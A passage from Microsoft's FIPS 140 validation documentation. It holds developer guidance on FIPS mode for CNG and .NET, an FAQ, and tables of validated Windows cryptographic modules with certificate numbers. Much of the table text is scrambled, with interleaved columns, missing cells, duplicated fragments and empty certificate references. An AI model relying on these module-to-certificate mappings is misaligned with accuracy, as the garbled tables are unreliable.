each validated cryptographic module are specified in the Security Policy document. Links to each of the Security
Policy documents is provided in the Microsoft FIPS 140 Validated Cryptographic Modules section below.
Generally, the restriction in Microsoft validated cryptographic modules is limiting the use of cryptography to only
FIPS Approved cryptographic algorithms, modes, and key sizes.
Using Microsoft Cryptographic Modules in a FIPS mode of operation
No matter whether developing with native languages or using .NET, it is important to first check whether the CNG
modules for the target system are FIPS validated. The list of validated CNG binaries is identified in the CNG
Validated Cryptographic Modules section.
When developing using CNG directly, it is the responsibility of the developer to follow the security rules outlined in
the FIPS 140 Security Policy for each module. The security policy for each module is provided on the CMVP
website. Links to each of the Security Policy documents is provided in the tables below. It is important to remember
that setting the FIPS local/group security policy Flag (discussed above) does not affect the behavior of the modules
when used for developing custom applications.
If you are developing your application using .NET instead of using the native libraries, then setting the FIPS local
policy flag will generate an exception when an improper .NET class is used for cryptography (i.e. the cryptographic
classes whose names end in "Managed"). The names of these allowed classes end with "Cng", which use the CNG
binaries or "CryptoServiceProvider", which use the legacy CAPI binaries.
Key Strengths and Validity Periods
NIST Special Publication 800-131A Revision 1, Transitions: Recommendation for Transitioning the Use of
Cryptographic Algorithms and Key Lengths, dated November 2015, [SP 800-131A], offers guidance for moving to
stronger cryptographic keys and algorithms. This does not replace NIST SP 800-57, Recommendation for Key
Management Part 1: General, [SP 800-57], but gives more specific guidance. One of the most important topics
discussed in these publications deals with the key strengths of FIPS Approved algorithms and their validity periods.
When developing applications that use FIPS Approved algorithms, it is also extremely important to select
appropriate key sizes based on the security lifetimes recommended by NIST.
FIPS 140 FAQ

The following are answers to commonly asked questions for the FIPS 140-2 validation of Microsoft products.
1. How does FIPS 140 relate to the Common Criteria?
Answer: These are two separate security standards with different, but complementary, purposes. FIPS 140 is a
standard designed specifically for validating product modules that implement cryptography. On the other hand,
Common Criteria is designed to help evaluate security functions in IT products.
In many cases, Common Criteria evaluations will rely on FIPS 140 validations to provide assurance that
cryptographic functionality is implemented properly.
2. How does FIPS 140 relate to Suite B?
Answer: Suite B is simply a set of cryptographic algorithms defined by the U.S. National Security Agency
(NSA) as part of its Cryptographic Modernization Program. The set of Suite B cryptographic algorithms are to
be used for both unclassified information and most classified information.
The Suite B cryptographic algorithms are a subset of the FIPS Approved cryptographic algorithms as allowed
by the FIPS 140 standard.
3. There are so many modules listed on the NIST website for each release, how are they related and how do I tell
which one applies to me?
Answer: Microsoft strives to validate all releases of its cryptographic modules. Each module provides a
different set of cryptographic algorithms. If you are required to use only FIPS validated cryptographic modules,
you simply need to verify that the version being used appears on the validation list.
Please see the Microsoft FIPS 140 Validated Cryptographic Modulessection for a complete list of Microsoft
validated modules.
4. My application links against crypt32.dll, cryptsp.dll, advapi32.dll, bcrypt.dll, bcryptprimitives.dll, or ncrypt.dll.
What do I need to do to assure I’m using FIPS 140 validated cryptographic modules?
Answer: crypt32.dll, cryptsp.dll, advapi32.dll, and ncrypt.dll are intermediary libraries that will offload all
cryptographic operations to the FIPS validated cryptographic modules. Bcrypt.dll itself is a validated
cryptographic module for Windows Vista and Windows Server 2008. For Windows 7 and Windows Server
2008 R2 and later, bcryptprimitives.dll is the validated module, but bcrypt.dll remains as one of the libraries to
link against.
You must first verify that the underlying CNG cryptographic module is validated. Once verified, you'll need to
confirm that you're using the module correctly in FIPS mode (See Information for Software Developers section
for details).
5. What does "When operated in FIPS mode" mean on certificates?
Answer: This caveat identifies that a required configuration and security rules must be followed in order to use
the cryptographic module in a manner consistent with its FIPS 140 Security Policy. The security rules are
defined in the Security Policy for the module and usually revolve around using only FIPS Approved
cryptographic algorithms and key sizes. Please see the Security Policy for the specific security rules for each
cryptographic module (See Microsoft FIPS 140 Validated Cryptographic Modules section for links to each
policy).
6. Which FIPS validated module is called when Windows 7 or Windows 8 is configured to use the FIPS setting in
the wireless configuration?
Answer: CNG is used. This setting tells the wireless driver to call FIPS 140-2 validated cryptographic modules
instead of using the driver’s own cryptography, if any.
7. Is BitLocker to Go FIPS 140-2 validated?
Answer: There are two separate parts for BitLocker to Go. One part is simply a native feature of BitLocker and
as such, it uses FIPS 140-2 validated cryptographic modules. The other part is the BitLocker to Go Reader
application for down-level support of older operating systems such as Windows XP and Windows Vista. The
Reader application does not use FIPS 140-2 validated cryptographic modules.
8. Are applications FIPS 140-2 validated?
Answer: Microsoft only has low -level cryptographic modules in Windows FIPS 140-2 validated, not high-level
applications. A better question is whether a certain application calls a FIPS 140-2 validated cryptographic
module in the underlying Windows OS. That question needs to be directed to the company/product group that
created the application of interest.
9. How can Systems Center Operations Manager 2012 be configured to use FIPS 140-2 validated cryptographic
modules?
Answer: See http://technet.microsoft.com/library/hh914094.aspx
Microsoft FIPS 140 Validated Cryptographic Modules

Modules By Operating System
The following tables identify the Cryptographic Modules for an operating system.
Windows
W i n d o w s 1 0 C r e a t o r s U p d a t e (Ve r si o n 1 70 3 )
Validated Editions: Home, Pro, Enterprise, Education, S, Surface Hub, Mobile
Cryptographic Module Version (link to Security FIPS Certificate # Algorithms

Policy)
Cryptographic Primitives 10.0.15063 #3095 FIPS Approved
Library (bcryptprimitives.dll algorithms: AES (Cert.
and ncryptsslp.dll) #4624); CKG (vendor
affirmed); CVL (Certs.
#1278 and #1281);
DRBG (Cert. #1555);
DSA (Cert. #1223);
ECDSA (Cert. #1133);
HMAC (Cert. #3061);
KAS (Cert. #127); KBKDF
(Cert. #140); KTS (AES
Cert. #4626; key
establishment
methodology provides
between 128 and 256
bits of encryption
strength); PBKDF
(vendor affirmed); RSA
(Certs. #2521 and
#2522); SHS (Cert.
#3790); Triple-DES (Cert.
#2459)
Other algorithms:
HMAC-MD5; MD5; DES;
Legacy CAPI KDF; MD2;
MD4; RC2; RC4; RSA
(encrypt/decrypt)
Validated Component
Implementations:
FIPS186-4 ECDSA -
Signature Generation of
hash sized messages
(Cert. #1133); FIPS186-4
RSA; PKCS#1 v2.1 -
RSASP1 Signature
Primitive (Cert. #2521);
FIPS186-4 RSA; RSADP -
RSADP Primitive (Cert.
#1281); SP800-135 -
Section 4.1.1, IKEv1
Section 4.2, TLS (Cert.
#1278)
Kernel Mode 10.0.15063 #3094 #3094
Cryptographic Primitives
Library (cng.sys) FIPS Approved
algorithms: AES (Certs.
#4624 and #4626); CKG
(vendor affirmed); CVL
(Certs. #1278 and
#1281); DRBG (Cert.
#1555); DSA (Cert.
#1223); ECDSA (Cert.
#1133); HMAC (Cert.
#3061); KAS (Cert.
#127); KBKDF (Cert.
#140); KTS (AES Cert.
#4626; key
establishment
between 128 and 256
bits of encryption
strength); PBKDF
(Certs. #2521 and
#2523); SHS (Cert.
#2459)
Other algorithms:
HMAC-MD5; MD5;
NDRNG; DES; Legacy
CAPI KDF; MD2; MD4;
RC2; RC4; RSA
(encrypt/decrypt)
Validated Component
Implementations:
FIPS186-4 ECDSA -
hash sized messages
(Cert.#1133); FIPS186-4
RSA; PKCS#1 v2.1 -
RSASP1 Signature
Primitive (Cert.#2521);
RSADP Primitive
(Cert.#1281)
Boot Manager 10.0.15063 #3089 FIPS Approved

#4624 and #4625); CKG
(vendor affirmed);
HMAC (Cert. #3061);
PBKDF (vendor
affirmed); RSA (Cert.
#2523); SHS (Cert.
#3790)
Other algorithms:
PBKDF (vendor
affirmed); VMK KDF
(vendor affirmed)
Windows OS Loader 10.0.15063 #3090 FIPS Approved
#4624 and #4625); RSA
(Cert. #2523); SHS (Cert.
#3790)
Other algorithms:
NDRNG
Windows Resume[1] 10.0.15063 #3091 FIPS Approved algorithms:

AES (Certs. #4624 and
#4625); RSA (Cert. #2523);
SHS (Cert. #3790)
BitLocker® Dump Filter[2] 10.0.15063 #3092 FIPS Approved algorithms:

#4625); RSA (Cert. #2522);
SHS (Cert. #3790)
Code Integrity (ci.dll) 10.0.15063 #3093 FIPS Approved

algorithms: AES (Cert.
#4624); RSA (Certs.
#2522 and #2523); SHS
(Cert. #3790)
Validated Component
Implementations:
FIPS186-4 RSA; PKCS#1
v1.5 - RSASP1 Signature
Primitive (Cert. #1282)
Secure Kernel Code Integrity 10.0.15063 #3096 FIPS Approved

(skci.dll)[3] algorithms: AES (Cert.
#4624); RSA (Certs.
#2522 and #2523); SHS
(Cert. #3790)
Validated Component
Implementations:
[1] Applies only to Home, Pro, Enterprise, Education and S

[2] Applies only to Pro, Enterprise, Education, S, Mobile and Surface Hub
[3] Applies only to Pro, Enterprise Education and S
W i n d o w s 1 0 A n n i v e r sa r y U p d a t e (Ve r si o n 1 6 0 7 )
Validated Editions: Home, Pro, Enterprise, Enterprise LTSB, Mobile

Policy)
and ncryptsslp.dll) #4064); DRBG (Cert.
#1217); DSA (Cert.
#911); HMAC (Cert.
#2651); KAS (Cert. #92);
KBKDF (Cert. #101); KTS
(AES Cert. #4062; key
wrapping; key
establishment
between 128 and 256
bits of encryption
strength); PBKDF
(Certs. #2192, #2193
and #2195); SHS (Cert.
#2227)
Other algorithms:
HMAC-MD5; MD5; DES;
MD4; RC2; RC4; RSA
(encrypt/decrypt)
Validated Component
Implementations:
FIPS186-4 ECDSA -
hash sized messages
(Cert. #922); FIPS186-4
RSA; PKCS#1 v2.1 -
RSASP1 Signature
#887); SP800-135 -
#886)
Kernel Mode 10.0.14393 #2936 FIPS Approved
Cryptographic Primitives algorithms: AES (Cert.
Library (cng.sys) #4064); DRBG (Cert.
#1217); DSA (Cert.
#911); HMAC (Cert.
#2651); KAS (Cert. #92);
KBKDF (Cert. #101); KTS
(AES Cert. #4062; key
wrapping; key
establishment
between 128 and 256
bits of encryption
strength); PBKDF
(Certs. #2192, #2193
#2227)
Other algorithms:
HMAC-MD5; MD5;
NDRNG; DES; Legacy
CAPI KDF; MD2; MD4;
RC2; RC4; RSA
(encrypt/decrypt)
Validated Component
Implementations:
FIPS186-4 ECDSA -
hash sized messages
(Cert. #922); FIPS186-4
RSA; PKCS#1 v2.1 -
RSASP1 Signature
#887)
Boot Manager 10.0.14393 #2931 FIPS Approved

#4061 and #4064);
HMAC (Cert. #2651);
PBKDF (vendor
#2193); SHS (Cert.
#3347)
Other algorithms: MD5;
PBKDF (non-compliant);
VMK KDF
BitLocker® Windows OS 10.0.14393 #2932 FIPS Approved algorithms:

Loader (winload) AES (Certs. #4061 and
#4064); RSA (Cert. #2193);
SHS (Cert. #3347)
Other algorithms: NDRNG;

MD5
BitLocker® Windows 10.0.14393 #2933 FIPS Approved algorithms:
Resume (winresume)[1] AES (Certs. #4061 and
#4064); RSA (Cert. #2193);
SHS (Cert. #3347)
Other algorithms: MD5
BitLocker® Dump Filter 10.0.14393 #2934 FIPS Approved algorithms:

(dumpfve.sys)[2] AES (Certs. #4061 and
#4064)

algorithms: RSA (Cert.
#2193); SHS (Cert.
#3347)
Other algorithms: AES

(non-compliant); MD5
Validated Component
Implementations:

(skci.dll)[3] algorithms: RSA (Certs.
#2193); SHS (Certs.
#3347)

Validated Component
Implementations:
[1] Applies only to Home, Pro, Enterprise and Enterprise LTSB

[2] Applies only to Pro, Enterprise, Enterprise LTSB and Mobile
[3] Applies only to Pro, Enterprise and Enterprise LTSB
W i n d o w s 1 0 N o v e m b e r 2 0 1 5 U p d a t e (Ve r si o n 1 5 1 1 )
Validated Editions: Home, Pro, Enterprise, Enterprise LTSB, Mobile, Surface Hub

Policy)
Library (bcryptprimitives.dll algorithms: AES (Certs.
and ncryptsslp.dll) #3629); DRBG (Certs.
#955); DSA (Certs.
#1024); ECDSA (Certs.
#760); HMAC (Certs.
#2381); KAS (Certs. #72;
key agreement; key
establishment
between 112 and 256
bits of encryption
strength); KBKDF (Certs.
#72); KTS (AES Certs.
#3653; key wrapping;
key establishment
between 128 and 256
bits of encryption
strength); PBKDF
(Certs. #1887, #1888
and #1889); SHS (Certs.
#3047); Triple-DES
(Certs. #2024)
Other algorithms: DES;

HMAC-MD5; Legacy
CAPI KDF; MD2; MD4;
MD5; RC2; RC4; RSA
(encrypt/decrypt)
Validated Component
Implementations:
FIPS186-4 ECDSA -
hash sized messages
(Cert. #666); FIPS186-4
RSA; PKCS#1 v2.1 -
RSASP1 Signature
#663); SP800-135 -
#664)
Cryptographic Primitives algorithms: AES (Certs.
Library (cng.sys) #3629); DRBG (Certs.
#955); DSA (Certs.
#760); HMAC (Certs.
#2381); KAS (Certs. #72;
key agreement; key
establishment
between 112 and 256
bits of encryption
key establishment
between 128 and 256
bits of encryption
strength); PBKDF
(Certs. #1887, #1888
#3047); Triple-DES
(Certs. #2024)

HMAC-MD5; Legacy
CAPI KDF; MD2; MD4;
MD5; RC2; RC4; RSA
(encrypt/decrypt)
Validated Component
Implementations:
FIPS186-4 ECDSA -
hash sized messages
(Cert. #666); FIPS186-4
RSA; PKCS#1 v2.1 -
RSASP1 Signature
#663)
Boot Manager[4] 10.0.10586 #2700 FIPS Approved algorithms:

AES (Certs. #3653); HMAC
(Cert. #2381); PBKDF
(vendor affirmed); RSA (Cert.
#1871); SHS (Certs. #3047
and #3048)

KDF (non-compliant); PBKDF
(non-compliant)
Loader (winload)[5] AES (Certs. #3629 and
#3653); RSA (Cert. #1871);
SHS (Cert. #3048)

NDRNG

Resume (winresume)[6] AES (Certs. #3653); RSA
#3048)

(dumpfve.sys)[7] AES (Certs. #3653)

algorithms: RSA (Certs.
#1871); SHS (Certs.
#3048)

Validated Component
Implementations:

#1871); SHS (Certs.
#3048)

Validated Component
Implementations:
[4] Applies only to Home, Pro, Enterprise, Mobile and Surface Hub
[5] Applies only to Home, Pro, Enterprise, Mobile and Surface Hub
[6] Applies only to Home, Pro and Enterprise
[7] Applies only to Pro, Enterprise, Mobile and Surface Hub
[8] Applies only to Enterprise and Enterprise LTSB
W i n d o w s 1 0 (Ve r si o n 1 5 0 7)
Validated Editions: Home, Pro, Enterprise, Enterprise LTSB, Mobile, and Surface Hub

Policy)
Library (bcryptprimitives.dll algorithms: AES (Certs.
#868); DSA (Certs.
#706); HMAC (Certs.
#2233); KAS (Certs. #64;
key agreement; key
establishment
between 112 and 256
bits of encryption
key establishment
between 128 and 256
bits of encryption
strength); PBKDF
(Certs. #1783, #1798,
#2886); Triple-DES
(Certs. #1969)

HMAC-MD5; Legacy
CAPI KDF; MD2; MD4;
MD5; RC2; RC4; RSA
(encrypt/decrypt)
Validated Component
Implementations:
#576); SP800-135 -
#575)
Cryptographic Primitives algorithms: AES (Certs.
#868); DSA (Certs.
#706); HMAC (Certs.
#2233); KAS (Certs. #64;
key agreement; key
establishment
between 112 and 256
bits of encryption
key establishment
between 128 and 256
bits of encryption
strength); PBKDF
(Certs. #1783, #1798,
#2886); Triple-DES
(Certs. #1969)

HMAC-MD5; Legacy
CAPI KDF; MD2; MD4;
MD5; RC2; RC4; RSA
(encrypt/decrypt)
Validated Component
Implementations:
#576)
Boot Manager[9] 10.0.10240 #2600 FIPS Approved algorithms:

AES (Cert. #3497); HMAC
(Cert. #2233); KTS (AES Cert.
#3498); PBKDF (vendor
affirmed); RSA (Cert. #1784);
SHS (Certs. #2871 and
#2886)

(non-compliant)

Loader (winload)[10] AES (Certs. #3497 and
#3498); RSA (Cert. #1784);
SHS (Cert. #2871)

NDRNG
Resume (winresume)[11] AES (Certs. #3497 and
#3498); RSA (Cert. #1784);
SHS (Cert. #2871)

(dumpfve.sys)[12] AES (Certs. #3497 and
#3498)

algorithms: RSA (Certs.
#1784); SHS (Certs.
#2871)

Validated Component
Implementations:

#1784); SHS (Certs.
#2871)

Validated Component
Implementations:

[12] Applies only to Pro, Enterprise and Enterprise LTSB
[13] Applies only to Enterprise and Enterprise LTSB
W i n d o w s 8 .1
Validated Editions: RT, Pro, Enterprise, Phone, Embedded

Policy)
Cryptographic Primitives 6.3.9600 6.3.9600.17031 #2357 FIPS Approved
#489); DSA (Cert. #855);
ECDSA (Cert. #505);
HMAC (Cert. #1773);
KAS (Cert. #47); KBKDF
(Cert. #30); PBKDF
(Certs. #1487, #1493
#1692)

(Cert. #2832, key
wrapping; key
establishment
between 128 and 256
bits of encryption
strength); AES-GCM
encryption (non-
compliant); DES; HMAC
MD5; Legacy CAPI KDF;
MD2; MD4; MD5;
NDRNG; RC2; RC4; RSA
(encrypt/decrypt)#2832,
key wrapping; key
establishment
between 128 and 256
bits of encryption
strength); AES-GCM
encryption (non-
MD2; MD4; MD5;
(encrypt/decrypt)
Validated Component
Implementations:
FIPS186-4 ECDSA -
hash sized messages
(Cert. #288); FIPS186-4
RSA; PKCS#1 v2.1 -
RSASP1 Signature
SP800-135 - Section
4.1.1, IKEv1 Section
4.1.2, IKEv2 Section 4.2,
TLS (Cert. #323)
Kernel Mode 6.3.9600 6.3.9600.17042 #2356 FIPS Approved
Cryptographic Primitives algorithms: AES (Cert.
#489); ECDSA (Cert.
#505); HMAC (Cert.
#1773); KAS (Cert. #47);
KBKDF (Cert. #30);
PBKDF (vendor
affirmed); RSA (Certs.
#1487, #1493 and
#1519); SHS (Cert. #
2373); Triple-DES (Cert.
#1692)

(Cert. #2832, key
wrapping; key
establishment
between 128 and 256
bits of encryption
strength); AES-GCM
encryption (non-
MD2; MD4; MD5;
(encrypt/decrypt)
Validated Component
Implementations:
FIPS186-4 ECDSA -
hash sized messages
(Cert. #288); FIPS186-4
RSA; PKCS#1 v2.1 -
RSASP1 Signature
Boot Manager 6.3.9600 6.3.9600.17031 #2351 FIPS Approved algorithms:

#1494); SHS (Certs. # 2373
and #2396)

(non-compliant)
BitLocker® Windows OS 6.3.9600 6.3.9600.17031 #2352 FIPS Approved algorithms:

Loader (winload) AES (Cert. #2832); RSA (Cert.
#1494); SHS (Cert. #2396)

NDRNG
BitLocker® Windows 6.3.9600 6.3.9600.17031 #2353 FIPS Approved algorithms:
Resume (winresume)[14] AES (Cert. #2832); RSA (Cert.
#1494); SHS (Certs. # 2373
and #2396)
BitLocker® Dump Filter 6.3.9600 6.3.9600.17031 #2354 FIPS Approved algorithms:

(dumpfve.sys) AES (Cert. #2832)
Other algorithms: N/A
Code Integrity (ci.dll) 6.3.9600 6.3.9600.17031 #2355#2355 FIPS Approved

algorithms: RSA (Cert.
#1494); SHS (Cert. #
2373)

Validated Component
Implementations:
PKCS#1 v2.1 - RSASP1
Signature Primitive (Cert.
#289)
[14] Applies only to Pro, Enterprise, and Embedded 8.

W indow s 8
Validated Editions: RT, Home, Pro, Enterprise, Phone

Policy)
Cryptographic Primitives 6.2.9200 #1892 FIPS Approved algorithms:

Library AES (Certs. #2197 and
(BCRYPTPRIMITIVES.DLL) #2216); DRBG (Certs. #258);
DSA (Cert. #687); ECDSA
(Cert. #341); HMAC (Cert.
#1345); KAS (Cert. #36);
KBKDF (Cert. #3); PBKDF
(Certs. #1133 and #1134);
SHS (Cert. #1903); Triple-DES
(Cert. #1387)
Other algorithms: AES (Cert.

#2197, key wrapping; key
establishment methodology
provides between 128 and
256 bits of encryption
strength); DES; Legacy CAPI
KDF; MD2; MD4; MD5;
HMAC MD5; RC2; RC4; RSA
(encrypt/decrypt)#258); DSA
(Cert. ); ECDSA (Cert. );
HMAC (Cert. ); KAS (Cert. );
KBKDF (Cert. ); PBKDF
(Certs. and ); SHS (Cert. );
Triple-DES (Cert. )
Kernel Mode 6.2.9200 #1891 FIPS Approved algorithms:
Cryptographic Primitives AES (Certs. #2197 and
Library (cng.sys) #2216); DRBG (Certs. #258
and #259); ECDSA (Cert.
#341); HMAC (Cert. #1345);
KAS (Cert. #36); KBKDF (Cert.
#3); PBKDF (vendor
affirmed); RNG (Cert. #1110);
RSA (Certs. #1133 and
#1134); SHS (Cert. #1903);
Triple-DES (Cert. #1387)

KDF; MD2; MD4; MD5;
(encrypt/decrypt)#258 and );
ECDSA (Cert. ); HMAC (Cert.
); KAS (Cert. ); KBKDF (Cert. );
PBKDF (vendor affirmed);
RNG (Cert. ); RSA (Certs. and
); SHS (Cert. ); Triple-DES
(Cert. )

, key wrapping; key
KDF; MD2; MD4; MD5;
(encrypt/decrypt)
Boot Manager 6.2.9200 #1895 FIPS Approved algorithms:

#2198); HMAC (Cert.
#1347); RSA (Cert. #1132);
SHS (Cert. #1903)

Loader (WINLOAD) AES (Certs. #2196 and
#2198); RSA (Cert. #1132);
SHS (Cert. #1903)

#2197; non-compliant);
MD5; Non-Approved RNG

Resume (WINRESUME)[15] AES (Certs. #2196 and
#2198); RSA (Cert. #1132);
SHS (Cert. #1903)

(DUMPFVE.SYS) AES (Certs. #2196 and
#2198)
Code Integrity (CI.DLL) 6.2.9200 #1897 FIPS Approved algorithms:

RSA (Cert. #1132); SHS (Cert.
#1903)
Enhanced DSS and Diffie- 6.2.9200 #1893 FIPS Approved algorithms:

Hellman Cryptographic DSA (Cert. #686); SHS (Cert.
Provider (DSSENH.DLL) #1902); Triple-DES (Cert.
#1386); Triple-DES MAC
(Triple-DES Cert. #1386,
vendor affirmed)
Other algorithms: DES; DES

MAC; DES40; DES40 MAC;
Diffie-Hellman; MD5; RC2;
RC2 MAC; RC4; Triple-DES
(Cert. #1386, key wrapping;
key establishment
methodology provides 112
bits of encryption strength;
non-compliant less than 112
bits of encryption
strength)#1902); Triple-DES
(Cert. ); Triple-DES MAC
(Triple-DES Cert. , vendor
affirmed)

(Cert. , key wrapping; key
provides 112 bits of
encryption strength; non-
compliant less than 112 bits
of encryption strength)
Enhanced Cryptographic 6.2.9200 #1894 FIPS Approved algorithms:
Provider (RSAENH.DLL) AES (Cert. #2196); HMAC
(Cert. #1346); RSA (Cert.
#1132); SHS (Cert. #1902);

strength); DES; MD2; MD4;
MD5; RC2; RC4; RSA (key
wrapping; key establishment
between 112 and 150 bits of
of encryption strength);
Triple-DES (Cert. #1386, key
bits of encryption strength)
[15] Applies only to Home and Pro

Windows 7
Validated Editions: Windows 7, Windows 7 SP1

Policy)
Cryptographic Primitives 6.1.7600.16385 1329 FIPS Approved algorithms:
(BCRYPTPRIMITIVES.DLL) 6.1.7601.17514 #1178); AES GCM (Cert.
#1168, vendor-affirmed);
AES GMAC (Cert. #1168,
vendor-affirmed); DRBG
(Certs. #23 and #24); DSA
(Cert. #386); ECDSA (Cert.
#141); HMAC (Cert. #677);
KAS (SP 800-56A, vendor
affirmed, key agreement; key
provides 80 to 256 bits of
encryption strength); RNG
(Cert. #649); RSA (Certs.
#559 and #560); SHS (Cert.
#846)

strength); DES; Diffie-
Hellman (key agreement; key
strength; non-compliant less
than 112 bits of encryption
strength); MD2; MD4; MD5;
HMAC MD5; RC2; RC4#559
and ); SHS (Cert. ); Triple-DES
(Cert. )

, key wrapping; key
HMAC MD5; RC2; RC4
Kernel Mode Cryptographic 6.1.7600.16385 1328 FIPS Approved algorithms:
Primitives Library (cng.sys) AES (Certs. #1168 and
6.1.7600.16915 #1178); AES GCM (Cert.
6.1.7600.21092 #1168, vendor-affirmed);
6.1.7601.17514 vendor-affirmed); DRBG
(Certs. #23 and #24); ECDSA
6.1.7601.17725 (Cert. #141); HMAC (Cert.
6.1.7601.17919 #677); KAS (SP 800-56A,
vendor affirmed, key
6.1.7601.21861 agreement; key
6.1.7601.22076 establishment methodology
encryption strength); RNG
(Cert. #649); RSA (Certs.
#559 and #560); SHS (Cert.
#846)

HMAC MD5; RC2; RC4
Boot Manager 6.1.7600.16385 1319 FIPS Approved algorithms:

6.1.7601.17514 #1177); HMAC (Cert. #675);
#1081)
Other algorithms:
MD5#1168 and ); HMAC
(Cert. ); RSA (Cert. ); SHS
(Cert. )
Winload OS Loader 6.1.7600.16385 1326 FIPS Approved algorithms:

(winload.exe) AES (Certs. #1168 and
6.1.7600.16757 #1177); RSA (Cert. #557);
6.1.7600.20897 SHS (Cert. #1081)
6.1.7600.20916 Other algorithms: MD5

6.1.7601.17514
6.1.7601.17556
6.1.7601.21655
6.1.7601.21675
BitLocker™ Drive Encryption 6.1.7600.16385 1332 FIPS Approved algorithms:
6.1.7600.16429 #1177); HMAC (Cert. #675);
6.1.7600.16757 SHS (Cert. #1081)
6.1.7600.20536 Other algorithms: Elephant

Diffuser
6.1.7600.20873
6.1.7600.20897
6.1.7600.20916
6.1.7601.17514
6.1.7601.17556
6.1.7601.21634
6.1.7601.21655
6.1.7601.21675
Code Integrity (CI.DLL) 6.1.7600.16385 1327 FIPS Approved algorithms:

6.1.7600.17122 #1081)
6.1.7600.21320
6.1.7601.17514
6.1.7601.17950
6.1.7601.22108
Enhanced DSS and Diffie- 6.1.7600.16385 1331 FIPS Approved algorithms:

Hellman Cryptographic (no change in SP1) DSA (Cert. #385); RNG (Cert.
Provider (DSSENH.DLL) #649); SHS (Cert. #1081);
Triple-DES (Cert. #846);
Triple-DES MAC (Triple-DES
Cert. #846, vendor affirmed)

RC2 MAC; RC4
Enhanced Cryptographic 6.1.7600.16385 1330 FIPS Approved algorithms:

Provider (RSAENH.DLL) (no change in SP1) AES (Cert. #1168); DRBG
#673); SHS (Cert. #1081);
RSA (Certs. #557 and #559);

MD2; MD4; MD5; RC2; RC4;
RSA (key wrapping; key
256-bits of encryption
strength)
W i n d o w s Vi st a SP 1
Validated Editions: Ultimate Edition

Policy)
Boot Manager (bootmgr) 6.0.6001.18000 and 978 FIPS Approved algorithms:

6.0.6002.18005 AES (Certs. #739 and #760);
HMAC (Cert. #415); RSA
#753)
Winload OS Loader 6.0.6001.18000, 979 FIPS Approved algorithms:

(winload.exe) 6.0.6001.18027, AES (Certs. #739 and #760);
6.0.6001.18606, RSA (Cert. #354); SHS (Cert.
6.0.6001.22125, #753)
6.0.6001.22861,
6.0.6002.18005, Other algorithms: MD5
6.0.6002.18411 and
6.0.6002.22596
Code Integrity (ci.dll) 6.0.6001.18000, 980 FIPS Approved algorithms:

6.0.6001.18023, RSA (Cert. #354); SHS (Cert.
6.0.6001.22120, and #753)
6.0.6002.18005
Kernel Mode Security 6.0.6001.18709, 1000 FIPS Approved
Support Provider Interface 6.0.6001.18272, algorithms: AES (Certs.
(ksecdd.sys) 6.0.6001.18796, #739 and #756); ECDSA
6.0.6001.22202, (Cert. #82); HMAC (Cert.
6.0.6001.22450, #412); RNG (Cert. #435
6.0.6001.22987, and SP 800-90 AES-CTR,
6.0.6001.23069, vendor-affirmed); RSA
6.0.6002.18005, (Certs. #353 and #357);
6.0.6002.18051, SHS (Cert. #753); Triple-
6.0.6002.18541, DES (Cert. #656)#739
6.0.6002.18643, and ); ECDSA (Cert. );
6.0.6002.22152, HMAC (Cert. ); RNG
6.0.6002.22742, and (Cert. and SP 800-90
6.0.6002.228696.0.6001.187 AES-CTR, vendor-
09, 6.0.6001.18272, affirmed); RSA (Certs.
6.0.6001.18796, and ); SHS (Cert. ); Triple-
6.0.6001.22202, DES (Cert. )
6.0.6001.22450,
6.0.6001.22987, Other algorithms: AES
6.0.6001.23069, (GCM and GMAC; non-
6.0.6002.18005, compliant); DES; Diffie-
6.0.6002.18051, Hellman (key agreement;
6.0.6002.18541, key establishment
6.0.6002.18643, methodology provides
6.0.6002.22152, between 112 and 150
6.0.6002.22742, and bits of encryption
6.0.6002.22869 strength; non-compliant
less than 112 bits of
encryption strength); EC
Diffie-Hellman (key
agreement; key
establishment
between 128 and 256
bits of encryption
strength); MD2; MD4;
MD5; HMAC MD5; RC2;
RC4; RNG (SP 800-90
Dual-EC; non-
compliant); RSA (key
wrapping; key
establishment
between 112 and 150
bits of encryption
strength; non-compliant
encryption strength)
Cryptographic Primitives 6.0.6001.22202, 1001 FIPS Approved
Library (bcrypt.dll) 6.0.6002.18005, and algorithms: AES (Certs.
6.0.6002.228726.0.6001.222 #739 and #756); DSA
02, 6.0.6002.18005, and (Cert. #283); ECDSA
6.0.6002.22872 (Cert. #82); HMAC (Cert.
#412); RNG (Cert. #435
and SP 800-90, vendor
affirmed); RSA (Certs.
#353 and #357); SHS
(Cert. #753); Triple-DES
(Cert. #656)
(GCM and GMAC; non-
compliant); DES; Diffie-
Hellman (key agreement;
key establishment
between 112 and 150
bits of encryption
encryption strength); EC
Diffie-Hellman (key
agreement; key
establishment
between 128 and 256
bits of encryption
strength); MD2; MD4;
MD5; RC2; RC4; RNG
(SP 800-90 Dual-EC;
non-compliant); RSA
(key wrapping; key
establishment
between 112 and 150
bits of encryption
provides less than 112
bits of encryption
strength)
Enhanced Cryptographic 6.0.6001.22202 and 1002 FIPS Approved

Provider (RSAENH) 6.0.6002.180056.0.6001.222 algorithms: AES (Cert.
02 and 6.0.6002.18005 #739); HMAC (Cert.
#407); RNG (SP 800-90,
vendor affirmed); RSA
(Certs. #353 and #354);
SHS (Cert. #753); Triple-
DES (Cert. #656)
MD2; MD4; MD5; RC2;
RC4; RSA (key wrapping;
key establishment
between 112 and 150
bits of encryption
Enhanced DSS and Diffie- 6.0.6001.18000 and 1003 FIPS Approved
Hellman Cryptographic 6.0.6002.180056.0.6001.180 algorithms: DSA (Cert.
Provider (DSSENH) 00 and 6.0.6002.18005 #281); RNG (Cert. #435);
DES (Cert. #656); Triple-
DES MAC (Triple-DES
Cert. #656, vendor
affirmed)
DES MAC; DES40;
DES40 MAC; Diffie-
Hellman (key agreement;
key establishment
between 112 and 150
bits of encryption
encryption strength);
MD5; RC2; RC2 MAC;
RC4
W i n d o w s Vi st a
Validated Editions: Ultimate Edition

Policy)

Provider (RSAENH) AES (Cert. #553); HMAC
(Cert. #297); RNG (Cert.
#321); RSA (Certs. #255 and
#258); SHS (Cert. #618);

strength)
Hellman Cryptographic DSA (Cert. #226); RNG (Cert.
Provider (DSSENH) #321); SHS (Cert. #618);

Diffie-Hellman (key
agreement; key
strength); MD5; RC2; RC2
MAC; RC4
BitLocker™ Drive Encryption 6.0.6000.16386 947 FIPS Approved algorithms:

#737)
Other algorithms: Elephant

Diffuser
Kernel Mode Security 6.0.6000.16386, 891 FIPS Approved algorithms:

Support Provider Interface 6.0.6000.16870 and AES (Cert. #553); ECDSA
(ksecdd.sys) 6.0.6000.21067 (Cert. #60); HMAC (Cert.
